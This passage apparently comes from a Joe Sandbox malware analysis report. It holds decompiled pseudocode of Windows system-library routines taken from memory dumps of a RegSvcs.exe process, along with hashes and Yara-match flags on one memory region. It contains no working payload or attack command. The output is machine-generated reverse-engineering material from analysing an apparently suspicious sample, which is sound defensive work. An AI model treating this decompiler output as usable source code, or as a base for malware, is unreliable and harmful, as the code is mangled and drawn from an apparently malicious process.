                                          							_t79 =  *((intOrPtr*)(_t120 + 0xc4));
                                          							goto L32;
                                          						}
                                          						__eflags =  *_t84 - 0x200;
                                          						if( *_t84 < 0x200) {
                                          							L23:
                                          							E0131A830(_t120, _t84, _v8);
                                          							goto L26;
                                          						}
                                          						__eflags =  *((intOrPtr*)(_t120 + 0x54)) - _t84[1];
                                          						if( *((intOrPtr*)(_t120 + 0x54)) == _t84[1]) {
                                          							goto L24;
                                          						}
                                          						goto L23;
                                          					}
                                          					_t104 = _t119[6];
                                          					_t55 =  *(_t79 + 4);
                                          					_v8 = _t104;
                                          					if( *_t104 != _t55) {
                                          						L18:
                                          						_push(_t82);
                                          						_push( *_t104);
                                          						E013BA80D(_t120, 0xd, _v16, _t55);
                                          						goto L26;
                                          					}
                                          					_t82 = _v20;
                                          					if( *_t104 != _v16) {
                                          						goto L18;
                                          					}
                                          					 *((intOrPtr*)(_t120 + 0x74)) =  *((intOrPtr*)(_t120 + 0x74)) - _t82;
                                          					_t114 =  *(_t120 + 0xb4);
                                          					if(_t114 == 0) {
                                          						L14:
                                          						_t57 = _v8;
                                          						 *_t57 = _t79;
                                          						 *(_t79 + 4) = _t57;
                                          						if((_t119[1] & 0x00000008) != 0) {
                                          							E0131A229(_t120, _t119);
                                          						}
                                          						_t115 = _t119;
                                          						_push(1);
                                          						_push( *_t119 & 0x0000ffff);
                                          						goto L25;
                                          					}
                                          					_t100 =  *_t119 & 0x0000ffff;
                                          					while(_t100 >=  *((intOrPtr*)(_t114 + 4))) {
                                          						_t61 =  *_t114;
                                          						__eflags = _t61;
                                          						if(_t61 == 0) {
                                          							_t63 =  *((intOrPtr*)(_t114 + 4)) - 1;
                                          							L13:
                                          							E0131BC04(_t120, _t114, 1, _v16, _t63, _t100);
                                          							goto L14;
                                          						}
                                          						_t114 = _t61;
                                          					}
                                          					_t63 = _t100;
                                          					goto L13;
                                          					L32:
                                          				} while (_t120 + 0xc0 != _t79);
                                          				_t80 = _v12;
                                          				if(_t80 != 0 &&  *(_t120 + 0x4c) != 0) {
                                          					_t111 =  *(_t120 + 0x50) ^  *_t80;
                                          					 *_t80 = _t111;
                                          					_t93 = _t111 >> 0x00000010 ^ _t111 >> 0x00000008 ^ _t111;
                                          					_t133 = _t111 >> 0x18 - _t93;
                                          					if(_t111 >> 0x18 != _t93) {
                                          						E013AFA2B(_t80, _t120, _t80, _t119, _t120, _t133, _t93);
                                          					}
                                          				}
                                          				goto L38;
                                          			}

                                          0x0139cbe2
                                          0x0139cbe4
                                          0x0139cbe6
                                          0x0139cc23
                                          0x0139cbf1
                                          0x0139cbfa
                                          0x00000000
                                          0x0139cbfa
                                          0x0139cbe8
                                          0x0139cbe8
                                          0x0139cbef
                                          0x00000000
                                          0x0139ccb6
                                          0x0139ccbc
                                          0x0139ccc4
                                          0x0139ccc9
                                          0x0139ccd4
                                          0x0139ccd8
                                          0x0139cce4
                                          0x0139cce9
                                          0x0139cceb
                                          0x0139ccf2
                                          0x0139ccf2
                                          0x0139cceb
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
                                          • Instruction ID: ead97d18cf6224e3d8bacc57e7d4792518e20256739cd80f737388327ee9b3ad
                                          • Opcode Fuzzy Hash: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
                                          • Instruction Fuzzy Hash: 9F51CF747006469BDF28DF6DC490AAABFF6FF88308F249159E6469B344D7319942CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1226a19f224ef168117c5ca08158f85d87f6776d01823543280e6fcac97d814
                                          • Instruction ID: c5490bc0ddc3751356c44c9e9544f62e894d3fc8fa0183f8edde54cdeeaccb7c
                                          • Opcode Fuzzy Hash: a1226a19f224ef168117c5ca08158f85d87f6776d01823543280e6fcac97d814
                                          • Instruction Fuzzy Hash: 428104329493C1DFDB02DF78E896B463FB1F756320748068EC8A14B1D2D77520A6DB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                          • Instruction ID: 19fdd23cc24b83e8c90001725f3d3d945805d05bc24b89184d3bb120e8257abd
                                          • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                          • Instruction Fuzzy Hash: AB5171B3E14A254BD3188E09CC40631B792EFD8312B5B81BADD199B397CA74E9529A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E012F52A5(char __ecx) {
                                          				char _v20;
                                          				char _v28;
                                          				char _v29;
                                          				void* _v32;
                                          				void* _v36;
                                          				void* _v37;
                                          				void* _v38;
                                          				void* _v40;
                                          				void* _v46;
                                          				void* _v64;
                                          				void* __ebx;
                                          				intOrPtr* _t49;
                                          				signed int _t53;
                                          				short _t85;
                                          				signed int _t87;
                                          				signed int _t88;
                                          				signed int _t89;
                                          				intOrPtr _t101;
                                          				intOrPtr* _t102;
                                          				intOrPtr* _t104;
                                          				signed int _t106;
                                          				void* _t108;
                                          
                                          				_t93 = __ecx;
                                          				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                          				_push(_t88);
                                          				_v29 = __ecx;
                                          				_t89 = _t88 | 0xffffffff;
                                          				while(1) {
                                          					E0130EEF0(0x13e79a0);
                                          					_t104 =  *0x13e8210; // 0xe91d60
                                          					if(_t104 == 0) {
                                          						break;
                                          					}
                                          					asm("lock inc dword [esi]");
                                          					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                          					E0130EB70(_t93, 0x13e79a0);
                                          					if( *((char*)(_t108 + 0xf)) != 0) {
                                          						_t101 =  *0x7ffe02dc;
                                          						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                          						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                          							L9:
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0x90028);
                                          							_push(_t108 + 0x20);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *((intOrPtr*)(_t104 + 4)));
                                          							_t53 = E01339890();
                                          							__eflags = _t53;
                                          							if(_t53 >= 0) {
                                          								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                          								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                          									E0130EEF0(0x13e79a0);
                                          									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                          									E0130EB70(0, 0x13e79a0);
                                          								}
                                          								goto L3;
                                          							}
                                          							__eflags = _t53 - 0xc0000012;
                                          							if(__eflags == 0) {
                                          								L12:
                                          								_t13 = _t104 + 0xc; // 0xe91d6d
                                          								_t93 = _t13;
                                          								 *((char*)(_t108 + 0x12)) = 0;
                                          								__eflags = E0132F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                          								if(__eflags >= 0) {
                                          									L15:
                                          									_t102 = _v28;
                                          									 *_t102 = 2;
                                          									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                          									E0130EEF0(0x13e79a0);
                                          									__eflags =  *0x13e8210 - _t104; // 0xe91d60
                                          									if(__eflags == 0) {
                                          										__eflags =  *((char*)(_t108 + 0xe));
                                          										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                          										 *0x13e8210 = _t102;
                                          										_t32 = _t102 + 0xc; // 0x0
                                          										 *_t95 =  *_t32;
                                          										_t33 = _t102 + 0x10; // 0x0
                                          										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                          										_t35 = _t102 + 4; // 0xffffffff
                                          										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                          										if(__eflags != 0) {
                                          											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                          											E01374888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                          										}
                                          										E0130EB70(_t95, 0x13e79a0);
                                          										asm("lock xadd [esi], eax");
                                          										if(__eflags == 0) {
                                          											_push( *((intOrPtr*)(_t104 + 4)));
                                          											E013395D0();
                                          											L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          										}
                                          										asm("lock xadd [esi], ebx");
                                          										__eflags = _t89 == 1;
                                          										if(_t89 == 1) {
                                          											_push( *((intOrPtr*)(_t104 + 4)));
                                          											E013395D0();
                                          											L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          										}
                                          										_t49 = _t102;
                                          										L4:
                                          										return _t49;
                                          									}
                                          									E0130EB70(_t93, 0x13e79a0);
                                          									asm("lock xadd [esi], eax");
                                          									if(__eflags == 0) {
                                          										_push( *((intOrPtr*)(_t104 + 4)));
                                          										E013395D0();
                                          										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          									}
                                          									 *_t102 = 1;
                                          									asm("lock xadd [edi], eax");
                                          									if(__eflags == 0) {
                                          										_t28 = _t102 + 4; // 0xffffffff
                                          										_push( *_t28);
                                          										E013395D0();
                                          										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                          									}
                                          									continue;
                                          								}
                                          								_t93 =  &_v20;
                                          								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                          								_t85 = 6;
                                          								_v20 = _t85;
                                          								_t87 = E0132F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                          								__eflags = _t87;
                                          								if(_t87 < 0) {
                                          									goto L3;
                                          								}
                                          								 *((char*)(_t108 + 0xe)) = 1;
                                          								goto L15;
                                          							}
                                          							__eflags = _t53 - 0xc000026e;
                                          							if(__eflags != 0) {
                                          								goto L3;
                                          							}
                                          							goto L12;
                                          						}
                                          						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                          						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                          							goto L3;
                                          						} else {
                                          							goto L9;
                                          						}
                                          					}
                                          					L3:
                                          					_t49 = _t104;
                                          					goto L4;
                                          				}
                                          				_t49 = 0;
                                          				goto L4;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ecc4f94d03686cf06b9de7943a13d5672cf1a3b95a9c899f75a3cabe99b3b30
                                          • Instruction ID: 0a9e87f73ec208b180866c9d777f296dbcc55c2f3a97a6a84a39fbc9c9d7ffaf
                                          • Opcode Fuzzy Hash: 7ecc4f94d03686cf06b9de7943a13d5672cf1a3b95a9c899f75a3cabe99b3b30
                                          • Instruction Fuzzy Hash: 2051CF71205742EBD322EF68C845B2BBBE4FF90B18F14092EF99587691E771E844C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E01322AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                          				signed short* _v8;
                                          				signed short* _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr* _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				short _t56;
                                          				signed int _t57;
                                          				intOrPtr _t58;
                                          				signed short* _t61;
                                          				intOrPtr _t72;
                                          				intOrPtr _t75;
                                          				intOrPtr _t84;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t90;
                                          				signed short* _t91;
                                          				signed int _t95;
                                          				signed short* _t96;
                                          				intOrPtr _t97;
                                          				intOrPtr _t102;
                                          				signed int _t108;
                                          				intOrPtr _t110;
                                          				signed int _t111;
                                          				signed short* _t112;
                                          				void* _t113;
                                          				signed int _t116;
                                          				signed short** _t119;
                                          				short* _t120;
                                          				signed int _t123;
                                          				signed int _t124;
                                          				void* _t125;
                                          				intOrPtr _t127;
                                          				signed int _t128;
                                          
                                          				_t90 = __ecx;
                                          				_v16 = __edx;
                                          				_t108 = _a4;
                                          				_v28 = __ecx;
                                          				_t4 = _t108 - 1; // -1
                                          				if(_t4 > 0x13) {
                                          					L15:
                                          					_t56 = 0xc0000100;
                                          					L16:
                                          					return _t56;
                                          				}
                                          				_t57 = _t108 * 0x1c;
                                          				_v32 = _t57;
                                          				_t6 = _t57 + 0x13e8204; // 0x0
                                          				_t123 =  *_t6;
                                          				_t7 = _t57 + 0x13e8208; // 0x13e8207
                                          				_t8 = _t57 + 0x13e8208; // 0x13e8207
                                          				_t119 = _t8;
                                          				_v36 = _t123;
                                          				_t110 = _t7 + _t123 * 8;
                                          				_v24 = _t110;
                                          				_t111 = _a4;
                                          				if(_t119 >= _t110) {
                                          					L12:
                                          					if(_t123 != 3) {
                                          						_t58 =  *0x13e8450; // 0x0
                                          						if(_t58 == 0) {
                                          							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                          						}
                                          					} else {
                                          						_t26 = _t57 + 0x13e821c; // 0x0
                                          						_t58 =  *_t26;
                                          					}
                                          					 *_t90 = _t58;
                                          					goto L15;
                                          				} else {
                                          					goto L2;
                                          				}
                                          				while(1) {
                                          					_t116 =  *_t61 & 0x0000ffff;
                                          					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                          					if(_t116 == _t128) {
                                          						goto L18;
                                          					}
                                          					L5:
                                          					if(_t116 >= 0x61) {
                                          						if(_t116 > 0x7a) {
                                          							_t97 =  *0x13e6d5c; // 0x7fc70654
                                          							_t72 =  *0x13e6d5c; // 0x7fc70654
                                          							_t75 =  *0x13e6d5c; // 0x7fc70654
                                          							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                          						} else {
                                          							_t116 = _t116 - 0x20;
                                          						}
                                          					}
                                          					if(_t128 >= 0x61) {
                                          						if(_t128 > 0x7a) {
                                          							_t102 =  *0x13e6d5c; // 0x7fc70654
                                          							_t84 =  *0x13e6d5c; // 0x7fc70654
                                          							_t87 =  *0x13e6d5c; // 0x7fc70654
                                          							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                          						} else {
                                          							_t128 = _t128 - 0x20;
                                          						}
                                          					}
                                          					if(_t116 == _t128) {
                                          						_t61 = _v12;
                                          						_t96 = _v8;
                                          					} else {
                                          						_t113 = _t116 - _t128;
                                          						L9:
                                          						_t111 = _a4;
                                          						if(_t113 == 0) {
                                          							_t115 =  &(( *_t119)[_t111 + 1]);
                                          							_t33 =  &(_t119[1]); // 0x100
                                          							_t120 = _a8;
                                          							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                          							_t35 = _t95 - 1; // 0xff
                                          							_t124 = _t35;
                                          							if(_t120 == 0) {
                                          								L27:
                                          								 *_a16 = _t95;
                                          								_t56 = 0xc0000023;
                                          								goto L16;
                                          							}
                                          							if(_t124 >= _a12) {
                                          								if(_a12 >= 1) {
                                          									 *_t120 = 0;
                                          								}
                                          								goto L27;
                                          							}
                                          							 *_a16 = _t124;
                                          							_t125 = _t124 + _t124;
                                          							E0133F3E0(_t120, _t115, _t125);
                                          							_t56 = 0;
                                          							 *((short*)(_t125 + _t120)) = 0;
                                          							goto L16;
                                          						}
                                          						_t119 =  &(_t119[2]);
                                          						if(_t119 < _v24) {
                                          							L2:
                                          							_t91 =  *_t119;
                                          							_t61 = _t91;
                                          							_v12 = _t61;
                                          							_t112 =  &(_t61[_t111]);
                                          							_v8 = _t112;
                                          							if(_t61 >= _t112) {
                                          								break;
                                          							} else {
                                          								_t127 = _v16 - _t91;
                                          								_t96 = _t112;
                                          								_v20 = _t127;
                                          								_t116 =  *_t61 & 0x0000ffff;
                                          								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                          								if(_t116 == _t128) {
                                          									goto L18;
                                          								}
                                          								goto L5;
                                          							}
                                          						} else {
                                          							_t90 = _v28;
                                          							_t57 = _v32;
                                          							_t123 = _v36;
                                          							goto L12;
                                          						}
                                          					}
                                          					L18:
                                          					_t61 =  &(_t61[1]);
                                          					_v12 = _t61;
                                          					if(_t61 >= _t96) {
                                          						break;
                                          					}
                                          					_t127 = _v20;
                                          				}
                                          				_t113 = 0;
                                          				goto L9;
                                          			}







































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b77d10a8aa2c81423cf6846f986d5f7670113327729b721b21e62ee9d165d8df
                                          • Instruction ID: 05e5318e7e3b22556ff54e4f7c213c8ddc8b8924de13527c6701b8d41b0db758
                                          • Opcode Fuzzy Hash: b77d10a8aa2c81423cf6846f986d5f7670113327729b721b21e62ee9d165d8df
                                          • Instruction Fuzzy Hash: D051E376E00135CFCB24EF1CC8909BEB7F5FB88704B05845AE846AB3A4D730AA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E013BAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed short* _t36;
                                          				signed int _t41;
                                          				char* _t42;
                                          				intOrPtr _t43;
                                          				signed int _t47;
                                          				void* _t52;
                                          				signed int _t57;
                                          				intOrPtr _t61;
                                          				signed char _t62;
                                          				signed int _t72;
                                          				signed char _t85;
                                          				signed int _t88;
                                          
                                          				_t73 = __edx;
                                          				_push(__ecx);
                                          				_t85 = __ecx;
                                          				_v8 = __edx;
                                          				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                          				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                          				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                          					_t57 = _t57 | 0x00000001;
                                          				}
                                          				_t88 = 0;
                                          				_t36 = 0;
                                          				_t96 = _a12;
                                          				if(_a12 == 0) {
                                          					_t62 = _a8;
                                          					__eflags = _t62;
                                          					if(__eflags == 0) {
                                          						goto L12;
                                          					}
                                          					_t52 = E013BC38B(_t85, _t73, _t57, 0);
                                          					_t62 = _a8;
                                          					 *_t62 = _t52;
                                          					_t36 = 0;
                                          					goto L11;
                                          				} else {
                                          					_t36 = E013BACFD(_t85, _t73, _t96, _t57, _a8);
                                          					if(0 == 0 || 0 == 0xffffffff) {
                                          						_t72 = _t88;
                                          					} else {
                                          						_t72 =  *0x00000000 & 0x0000ffff;
                                          					}
                                          					 *_a12 = _t72;
                                          					_t62 = _a8;
                                          					L11:
                                          					_t73 = _v8;
                                          					L12:
                                          					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                          						L19:
                                          						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                          							L22:
                                          							_t74 = _v8;
                                          							__eflags = _v8;
                                          							if(__eflags != 0) {
                                          								L25:
                                          								__eflags = _t88 - 2;
                                          								if(_t88 != 2) {
                                          									__eflags = _t85 + 0x44 + (_t88 << 6);
                                          									_t88 = E013BFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                          									goto L34;
                                          								}
                                          								L26:
                                          								_t59 = _v8;
                                          								E013BEA55(_t85, _v8, _t57);
                                          								asm("sbb esi, esi");
                                          								_t88 =  ~_t88;
                                          								_t41 = E01317D50();
                                          								__eflags = _t41;
                                          								if(_t41 == 0) {
                                          									_t42 = 0x7ffe0380;
                                          								} else {
                                          									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          								}
                                          								__eflags =  *_t42;
                                          								if( *_t42 != 0) {
                                          									_t43 =  *[fs:0x30];
                                          									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                          									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                          										__eflags = _t88;
                                          										if(_t88 != 0) {
                                          											E013B1608(_t85, _t59, 3);
                                          										}
                                          									}
                                          								}
                                          								goto L34;
                                          							}
                                          							_push(_t62);
                                          							_t47 = E013C1536(0x13e8ae4, (_t74 -  *0x13e8b04 >> 0x14) + (_t74 -  *0x13e8b04 >> 0x14), _t88, __eflags);
                                          							__eflags = _t47;
                                          							if(_t47 == 0) {
                                          								goto L26;
                                          							}
                                          							_t74 = _v12;
                                          							_t27 = _t47 - 1; // -1
                                          							_t88 = _t27;
                                          							goto L25;
                                          						}
                                          						_t62 = _t85;
                                          						if(L013BC323(_t62, _v8, _t57) != 0xffffffff) {
                                          							goto L22;
                                          						}
                                          						_push(_t62);
                                          						_push(_t88);
                                          						E013BA80D(_t85, 9, _v8, _t88);
                                          						goto L34;
                                          					} else {
                                          						_t101 = _t36;
                                          						if(_t36 != 0) {
                                          							L16:
                                          							if(_t36 == 0xffffffff) {
                                          								goto L19;
                                          							}
                                          							_t62 =  *((intOrPtr*)(_t36 + 2));
                                          							if((_t62 & 0x0000000f) == 0) {
                                          								goto L19;
                                          							}
                                          							_t62 = _t62 & 0xf;
                                          							if(E0139CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                          								L34:
                                          								return _t88;
                                          							}
                                          							goto L19;
                                          						}
                                          						_t62 = _t85;
                                          						_t36 = E013BACFD(_t62, _t73, _t101, _t57, _t62);
                                          						if(_t36 == 0) {
                                          							goto L19;
                                          						}
                                          						goto L16;
                                          					}
                                          				}
                                          			}




















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6acacefbc3d19affd345b74ceacb5a751ecb53786373b0202d958b89b0516043
                                          • Instruction ID: 22d2a920bdc8e75ef7a2ca1287d00c8ed77b70b8bc8492fdd84e4fe661729f58
                                          • Opcode Fuzzy Hash: 6acacefbc3d19affd345b74ceacb5a751ecb53786373b0202d958b89b0516043
                                          • Instruction Fuzzy Hash: 7041F571704A119BDB268A2DCCC4BFBBB99AF84628F044219FB5AC7AD0F734D805C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E0131DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				char _v5;
                                          				signed int _v12;
                                          				signed int* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t54;
                                          				char* _t58;
                                          				signed int _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr _t68;
                                          				intOrPtr _t72;
                                          				intOrPtr _t73;
                                          				signed int* _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr _t80;
                                          				char _t82;
                                          				signed int _t83;
                                          				signed int _t84;
                                          				signed int _t88;
                                          				signed int _t89;
                                          				intOrPtr _t90;
                                          				intOrPtr _t92;
                                          				signed int _t97;
                                          				intOrPtr _t98;
                                          				intOrPtr* _t99;
                                          				signed int* _t101;
                                          				signed int* _t102;
                                          				intOrPtr* _t103;
                                          				intOrPtr _t105;
                                          				signed int _t106;
                                          				void* _t118;
                                          
                                          				_t92 = __edx;
                                          				_t75 = _a4;
                                          				_t98 = __ecx;
                                          				_v44 = __edx;
                                          				_t106 = _t75[1];
                                          				_v40 = __ecx;
                                          				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                          					_t82 = 0;
                                          				} else {
                                          					_t82 = 1;
                                          				}
                                          				_v5 = _t82;
                                          				_t6 = _t98 + 0xc8; // 0xc9
                                          				_t101 = _t6;
                                          				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                          				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                          				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                          				if(_t82 != 0) {
                                          					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                          					_t83 =  *_t75;
                                          					_t54 = _t75[1];
                                          					 *_t101 = _t83;
                                          					_t84 = _t83 | _t54;
                                          					_t101[1] = _t54;
                                          					if(_t84 == 0) {
                                          						_t101[1] = _t101[1] & _t84;
                                          						 *_t101 = 1;
                                          					}
                                          					goto L19;
                                          				} else {
                                          					if(_t101 == 0) {
                                          						E012FCC50(E012F4510(0xc000000d));
                                          						_t88 =  *_t101;
                                          						_t97 = _t101[1];
                                          						L15:
                                          						_v12 = _t88;
                                          						_t66 = _t88 -  *_t75;
                                          						_t89 = _t97;
                                          						asm("sbb ecx, [ebx+0x4]");
                                          						_t118 = _t89 - _t97;
                                          						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                          							_t66 = _t66 | 0xffffffff;
                                          							_t89 = 0x7fffffff;
                                          						}
                                          						 *_t101 = _t66;
                                          						_t101[1] = _t89;
                                          						L19:
                                          						if(E01317D50() != 0) {
                                          							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t58 = 0x7ffe0386;
                                          						}
                                          						_t102 = _v16;
                                          						if( *_t58 != 0) {
                                          							_t58 = E013C8ED6(_t102, _t98);
                                          						}
                                          						_t76 = _v44;
                                          						E01312280(_t58, _v44);
                                          						E0131DD82(_v44, _t102, _t98);
                                          						E0131B944(_t102, _v5);
                                          						return E0130FFB0(_t76, _t98, _t76);
                                          					}
                                          					_t99 = 0x7ffe03b0;
                                          					do {
                                          						_t103 = 0x7ffe0010;
                                          						do {
                                          							_t67 =  *0x13e8628; // 0x0
                                          							_v28 = _t67;
                                          							_t68 =  *0x13e862c; // 0x0
                                          							_v32 = _t68;
                                          							_v24 =  *((intOrPtr*)(_t99 + 4));
                                          							_v20 =  *_t99;
                                          							while(1) {
                                          								_t97 =  *0x7ffe000c;
                                          								_t90 =  *0x7FFE0008;
                                          								if(_t97 ==  *_t103) {
                                          									goto L10;
                                          								}
                                          								asm("pause");
                                          							}
                                          							L10:
                                          							_t79 = _v24;
                                          							_t99 = 0x7ffe03b0;
                                          							_v12 =  *0x7ffe03b0;
                                          							_t72 =  *0x7FFE03B4;
                                          							_t103 = 0x7ffe0010;
                                          							_v36 = _t72;
                                          						} while (_v20 != _v12 || _t79 != _t72);
                                          						_t73 =  *0x13e8628; // 0x0
                                          						_t105 = _v28;
                                          						_t80 =  *0x13e862c; // 0x0
                                          					} while (_t105 != _t73 || _v32 != _t80);
